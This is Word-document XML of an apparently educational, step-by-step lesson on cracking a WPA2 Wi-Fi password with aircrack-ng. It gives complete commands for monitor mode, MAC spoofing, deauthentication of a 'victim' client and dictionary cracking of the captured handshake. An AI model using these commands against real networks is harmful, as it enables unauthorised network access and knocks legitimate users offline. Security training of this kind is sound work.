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05" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5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Open a console terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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Click on the console terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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23B040F" wp14:editId="0D179981">
            <wp:extent cx="5981700" cy="4876800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture 16" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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utersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.2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Load Drivers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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modprobe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5140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rt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D514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00"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5140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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D514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00"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5140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87</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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The character after the "t" is the </w:t>
      </w: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character "l" </w:t>
      </w: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as in</w:t>
      </w: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 lion.</w:t>
      </w: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gram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one</w:t>
      </w:r>
      <w:proofErr w:type="gram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D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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The character after the "8" </w:t>
      </w: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is</w:t>
      </w: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 the number one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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D68AC79" wp14:editId="13AD8A28">
            <wp:extent cx="5981700" cy="4981575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15" name="Picture 15" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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mputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.3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D51405" w:rsidRPr="00D51405" w:rsidTr="00D51405">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="336699"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51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40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Section 6. Enable Monitor Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5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Enable Monitor Mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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airmon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-ng start wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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399DF1A" wp14:editId="41108F42">
            <wp:extent cx="5981700" cy="4981575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14" name="Picture 14" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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mputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.3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D51405" w:rsidRPr="00D51405" w:rsidTr="00D51405">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="336699"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51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40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Section 7. Change MAC address for mon0 interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51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Temporarily bring down the mon0 interface</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51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ifconfig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mon0 down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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ifconfig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mon0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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Notice there is no "UP" in front of the word BROADCAST on the second line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51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Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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 order to change the MAC address of any interface, you must bring down </w:t>
      </w:r>
      <w:proofErr w:type="gram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the that</w:t>
      </w:r>
      <w:proofErr w:type="gram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particular interface before changing it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51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354B443" wp14:editId="53944DA6">
            <wp:extent cx="5981700" cy="4686300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Picture 13" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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mputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.3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Change MAC Address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51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macchanger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-m 00:11:22:33:44:55 mon0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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Change MAC Address for the mon0 interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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ifconfig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mon0 up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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Plumb up the mon0 interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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ifconfig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mon0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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Verify the mon0 interface is up.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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Notice the word "UP" in front of the word BROADCAST on the second line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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Also, notice on the first line that you have a new MAC Address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B73B4F0" wp14:editId="20F16103">
            <wp:extent cx="5972175" cy="4705350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="12" name="Picture 12" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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mputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.3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D51405" w:rsidRPr="00D51405" w:rsidTr="00D51405">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="336699"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51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40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Section 8. View Surrounding Wireless Networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5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View surrounding wireless networks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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airodump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-ng mon0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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Continue to Next Step.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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237373" wp14:editId="5610E7EE">
            <wp:extent cx="5981700" cy="5029200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 11" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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mputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.3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Finding a potential victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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In our case, the victim SID is WPA2CRACK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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Once you see WPA2CRACK, Press the &lt;Ctrl&gt; and "c" keys at the same time to stop the scan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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Record WPA2CRACK's BSSID (00:14</w:t>
      </w:r>
      <w:proofErr w:type="gram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:BF:D1:D1:29</w:t>
      </w:r>
      <w:proofErr w:type="gram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) and Channel (6).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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19E778A" wp14:editId="175CE06C">
            <wp:extent cx="5972175" cy="4676775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="10" name="Picture 10" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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mputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.3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D51405" w:rsidRPr="00D51405" w:rsidTr="00D51405">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="336699"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51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40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Section 9. Let the Injection and Cracking Begin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5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Open Two Terminal Consoles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Click the terminal console icon twice and position your screens like mine.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11A494D" wp14:editId="487B0668">
            <wp:extent cx="5981700" cy="5010150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture 9" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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mputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.32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Fire up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airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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airodump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-ng -c </w:t>
      </w:r>
      <w:r w:rsidRPr="00D51405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 -w crack_output.txt --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bssid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51405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00:14:BF:D1:D1:29</w:t>
      </w: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 --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ivs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mon0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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-c, specifies the channel.  In my case, it will be channel 6.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51405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Obtained in Section 8, Step 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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-w, specifies an output file required for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aircrack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-ng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51405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Obtained in Section 8, Step 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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bssid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, specifies the victims BSSID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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ivs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, specifies the initialization vectors</w:t>
      </w:r>
      <w:proofErr w:type="gram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  used</w:t>
      </w:r>
      <w:proofErr w:type="gram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aircrack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-ng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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mon0,</w:t>
      </w:r>
      <w:proofErr w:type="gram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wan0's promiscuous monitor interface.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Continue to Next Step.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2B1B227" wp14:editId="660C4AFF">
            <wp:extent cx="5972175" cy="4686300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="8" name="Picture 8" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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mputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.35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Copy the Access Point and Client BSSID's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When you see a line below the STATION, Press &lt;Ctrl&gt; and "c".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Highlight both the Access Point and Client BSSID's.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Right Click and Copy.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0A607C2" wp14:editId="7C845F43">
            <wp:extent cx="5972175" cy="4714875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="7" name="Picture 7" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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mputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.36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Paste the Access Point and Client BSSID's in Notepad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Applications --&gt; Wine --&gt; Programs --&gt; Accessories --&gt; Notepad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Edit --&gt; Paste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D47799C" wp14:editId="3A114D2F">
            <wp:extent cx="5981700" cy="4695825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6" name="Picture 6" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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omputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.36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Restart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airodump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-ng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airodump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-ng -c </w:t>
      </w:r>
      <w:r w:rsidRPr="00D51405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 -w crack_output.txt --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bssid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51405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00:14:BF:D1:D1:29</w:t>
      </w:r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 --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>ivs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mon0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Continue to Next Step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44CAD320" wp14:editId="34123E4E">
            <wp:extent cx="5972175" cy="4695825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="5" name="Picture 5" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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omputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.35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Send Authentication Request to Victim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 (See Below Pictures First)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5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In the bottom window, type the following command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D514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-ng -0 1 -a 00:14:BF:D1:D1:29 -c 00:23:14:BA:54:20 -e WPA2CRACK mon0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51405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This will send a de-authentication request to the victim BSSID to receive a WPA Handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51405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-0, </w:t>
      </w:r>
      <w:proofErr w:type="gram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This</w:t>
      </w:r>
      <w:proofErr w:type="gram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flag sends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disassocated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packets to one or more clients which are currently associated with a particular access point.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51405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-a 00:14</w:t>
      </w:r>
      <w:proofErr w:type="gram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:BF:D1:D1:29</w:t>
      </w:r>
      <w:proofErr w:type="gram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, where "00:14:BF:D1:D1:29" is the access point BSSID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51405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-c 00:23:14:BA:54:20, where "00:23:14:BA:54:20" is the client BSSID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5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</w:t>
      </w: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:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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The Access Point and Client BSSID was obtained in Section 9, Step 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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AECFB58" wp14:editId="307343F9">
            <wp:extent cx="5981700" cy="4705350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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mputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.36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Wait for WPA handshake message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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In top window, hit &lt;Ctrl&gt; and "c", after you see the WPA handshake message.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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1037B9A" wp14:editId="0DA99C1D">
            <wp:extent cx="5972175" cy="4695825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="3" name="Picture 3" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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omputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.36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Run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aircrack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-ng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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4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aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D514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-ng -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D514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pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D514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/passwords/john/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D514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password.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D514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crack_output.txt-02.ivs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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-w, specifies the password list that will be used by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aircrack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D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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crack_output.txt-02.ivs</w:t>
      </w:r>
      <w:proofErr w:type="gram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your output file that contains the initialization vector (IV) captured after sending WPA2CRACK a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deauth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request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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ED6BDDB" wp14:editId="4F3E52AC">
            <wp:extent cx="5981700" cy="4705350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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omputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.36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1405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D51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Review </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-ng password results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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Look for the message KEY FOUND.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5140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405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Remember WPA and WPA2 is strong if your password is strong, otherwise, it is easier to crack than WEP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51405" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D514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24F681B4" wp14:editId="1FDA9B7A">
            <wp:extent cx="5972175" cy="4695825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="http://www.computersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.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omputersecuritystudent.com/SECURITY_TOOLS/WIRELESS/lesson2/index.36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05" w:rsidRPr="00D51405" w:rsidRDefault="00D51405" w:rsidP="00D5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65D81" w:rsidRDefault="00E65D81" w:rsidP="00D51405"/>
    <w:sectPr w:rsidR="00E65D81" w:rsidSect="00D51405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7BC1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA1C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C04E0E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7FA4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612C87"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1F4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D9341B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4A7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D2BC4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="971C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05"/>
    <w:rsid w:val="00D51405"/>
    <w:rsid w:val="00E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1405"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D5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1405"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D5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2015-10-28T20:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-10-28T20:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>